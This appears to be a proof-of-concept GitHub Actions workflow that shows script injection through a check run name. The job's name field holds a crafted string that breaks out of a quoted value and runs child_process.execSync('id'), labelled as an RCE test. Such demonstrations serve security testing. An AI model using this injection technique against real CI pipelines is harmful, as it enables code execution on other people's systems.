name: Trigger Check Run
on: pull_request
jobs:
  malicious_job:
    # THIS is the check_run.name that gets injected into the script!
    name: "\"; console.log('*** CHECK RUN RCE SUCCESS ***'); require('child_process').execSync('id'); //"
    runs-on: ubuntu-latest
    steps:
      - run: echo "Executing malicious check run name"

